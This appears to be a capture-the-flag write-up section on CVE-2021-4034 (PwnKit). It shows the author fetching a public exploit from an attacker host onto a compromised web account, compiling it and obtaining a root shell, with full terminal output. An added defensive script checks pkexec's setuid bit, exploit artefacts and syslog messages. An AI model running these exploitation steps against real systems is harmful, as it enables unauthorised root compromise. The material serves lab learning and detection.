CVE-2021-4034
PEAS has identified that the target system is vulnerable to CVE-2021-4034
The vulnerable program is part of Polkit, which manages process privileges. Polkit's pkexec allows non-privileged processes to communicate with privileged ones, and it also instruments legitimate, authorized uses of privilege escalation, similar to sudo.
A memory corruption flaw exists when pkexec is started with no arguments at all (an empty argument list). By manipulating environment variables, an attacker can trick pkexec into loading and executing arbitrary code with superuser privileges.
Exploit (pwnkit)
I found an exploit online
┌──(kali㉿kali)-[~/archive/thm/ultratech]
└─$ git clone https://github.com/berdav/CVE-2021-4034 ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
Receiving objects: 100% (92/92), 22.71 KiB | 1.08 MiB/s, done.
Resolving deltas: 100% (44/44), done.
Downloading the exploit package to Kali
Exploitation
www@ultratech-prod:/dev/shm$ wget http://10.9.1.180/CVE-2021-4034.tar.gz ; tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034
--2024-07-22 17:53:06-- http://10.9.1.180/CVE-2021-4034.tar.gz
Connecting to 10.9.1.180:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 41867 (41K) [application/gzip]
Saving to: ‘CVE-2021-4034.tar.gz’
CVE-2021-4034.tar.gz 100%[=============================================================>] 40.89K --.-KB/s in 0.06s
2024-07-22 17:53:07 (656 KB/s) - ‘CVE-2021-4034.tar.gz’ saved [41867/41867]
Delivery complete
www@ultratech-prod:/dev/shm/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.
Compiling locally
www@ultratech-prod:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# hostname
ultratech-prod
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc fq_codel state UP group default qlen 1000
link/ether 02:1c:21:b7:f9:bf brd ff:ff:ff:ff:ff:ff
inet 10.10.57.71/16 brd 10.10.255.255 scope global dynamic eth0
valid_lft 2775sec preferred_lft 2775sec
inet6 fe80::1c:21ff:feb7:f9bf/64 scope link
valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:92:e3:60:06 brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
inet6 fe80::42:92ff:fee3:6006/64 scope link
valid_lft forever preferred_lft forever
System Level Compromise
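The description of the flaw above and the build output of the exploit (the make step creates a directory literally named "GCONV_PATH=." and a gconv-modules file in /dev/shm) give a defender three concrete things to check. The script below is an added example written for this page, not code from the writeup or from the berdav repository: it reports whether the local pkexec still carries the setuid bit (the interim mitigation from the advisory was to remove it until the patched polkit package is installed), sweeps world-writable staging directories for the exploit's file-system artefacts, and greps a log for the two messages pkexec writes to syslog when it refuses a malformed environment. It assumes pkexec lives at /usr/bin/pkexec (override with PKEXEC) and uses constructed auth.log lines, not real captures, so the log check runs offline.

```shell
#!/bin/sh
# Added defensive check for CVE-2021-4034 (pwnkit). Example code written for
# this page, not part of the writeup or of the berdav exploit repository.
# Assumptions: find, grep and mktemp are available; pkexec is at
# /usr/bin/pkexec (set PKEXEC if the distribution puts it elsewhere).
PKEXEC=${PKEXEC:-/usr/bin/pkexec}

# Check 1: is the binary still setuid? pkexec needs the setuid bit to be
# exploitable at all; the interim mitigation in the advisory was to remove it
# (chmod 0755) until the patched policykit package is installed.
is_setuid() {
    [ -u "$1" ]
}

# Check 2: the build shown above creates a directory literally named
# "GCONV_PATH=." and a file "gconv-modules" in a world-writable location
# such as /dev/shm. Neither name has a legitimate reason to exist there,
# so their presence is a strong indicator of a staged exploit.
find_pwnkit_artifacts() {
    find "$1" \( -type d -name 'GCONV_PATH=*' -o -type f -name 'gconv-modules' \) 2>/dev/null
}

# Check 3: pkexec logs to syslog when it refuses a malformed environment.
# The two messages below (the second is misspelled in the pkexec source)
# are the usual trace an exploitation attempt leaves in auth.log/journal.
grep_pkexec_log() {
    grep -E 'pkexec\[[0-9]+\]:.*(SHELL variable was not found the /etc/shells file|contains suscipious content)' "$1"
}

# Constructed sample auth.log lines (not real captures) so the log check
# can be exercised offline; the benign "Executing command" line must not match.
make_sample_log() {
    _log="$1/auth.log.sample"
    cat > "$_log" <<'EOF'
Jan 26 10:00:00 host1 sshd[2100]: Accepted publickey for alice from 10.0.0.5 port 50222 ssh2
Jan 26 10:00:05 host1 pkexec[2200]: alice: Executing command [USER=root] [TTY=/dev/pts/1] [CWD=/home/alice] [COMMAND=/usr/bin/systemctl restart nginx]
Jan 26 10:01:10 host1 pkexec[2310]: alice: The value for the SHELL variable was not found the /etc/shells file [USER=root] [TTY=/dev/pts/0] [CWD=/dev/shm] [COMMAND=]
Jan 26 10:01:12 host1 pkexec[2311]: alice: The value for environment variable XAUTHORITY contains suscipious content [USER=root] [TTY=/dev/pts/0] [CWD=/dev/shm] [COMMAND=]
EOF
    echo "$_log"
}

# Stand-alone run: report on the local pkexec, sweep the usual staging
# directories, and show the log check against the constructed sample.
if is_setuid "$PKEXEC"; then
    echo "$PKEXEC is setuid: confirm the patched polkit package is installed"
else
    echo "$PKEXEC is absent or not setuid (mitigated)"
fi
for d in /tmp /var/tmp /dev/shm; do
    if [ -d "$d" ]; then
        find_pwnkit_artifacts "$d"
    fi
done
_tmp=$(mktemp -d)
grep_pkexec_log "$(make_sample_log "$_tmp")" || echo "no pkexec refusals in sample"
rm -rf "$_tmp"
```

The setuid check is the one that decides whether the host is exposed at all; the artefact sweep and the log grep are for finding out whether someone has already tried. Run the sweep over any other directory the web user can write to, since /dev/shm is only the location this particular writeup used.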